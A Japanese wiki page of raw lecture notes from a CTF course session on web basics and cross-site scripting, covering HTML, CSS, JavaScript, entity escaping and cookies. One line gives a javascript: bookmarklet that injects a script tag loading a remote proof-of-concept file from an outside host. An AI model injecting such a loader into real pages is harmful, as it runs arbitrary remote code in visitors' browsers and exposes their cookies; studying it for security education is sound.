ユーザ用ツール

サイト用ツール


サイドバー

isshi:ctf:4

講義中にとったメモをそのままはっつけました。 何に役立つかわかりませんが、どうぞ。

第四回

  • XSS: 悪い人が書いたものが、横断してページを荒らす
  • HTML: 文章
  • CSS: 見た目(プログラム書ける)
  • JavaScript: ロジック (ここ押したらどうなるとか)
    • <span>,<div>: 特に意味なし(ただの目印)
  • HTMLのなかにはタグ <~~~(ex: div class = “hoge”)>
    • こうすると、CSSから後ろのいろとか、画像とか入れられる
  • #09f ⇒ #0099ff 左から R G B で0~255の値を決められる ※この値は明るいブルー
  • javascript:(function(d,s){s=d.createElement('script');s.src='http://o0i.es/5000tri/poc.js';d.getElementsByTagName('head')[0].appendChild(s);})(document); →5000兆円スクリプトを呼び出すやつ
  • replace( _ , _ ) →置き換え
  • < 〜〜〜 >… &lt; 〜〜〜 & gt; : <>と同じ効果だけど、タグとしての意味がなくなってしまう
  • &quot;は、””になる
  • Cookie: サーバーがセッションを作ってパソコンに送信→PCのなかに置いておく(IDやPW)
    • JavaScriptだと読める
    • _ga _gid: gはGoogleのg 個人を特定して、誰がどのページ見たかもわかる
isshi/ctf/4.txt · 最終更新: 2018/08/15 16:49 (外部編集)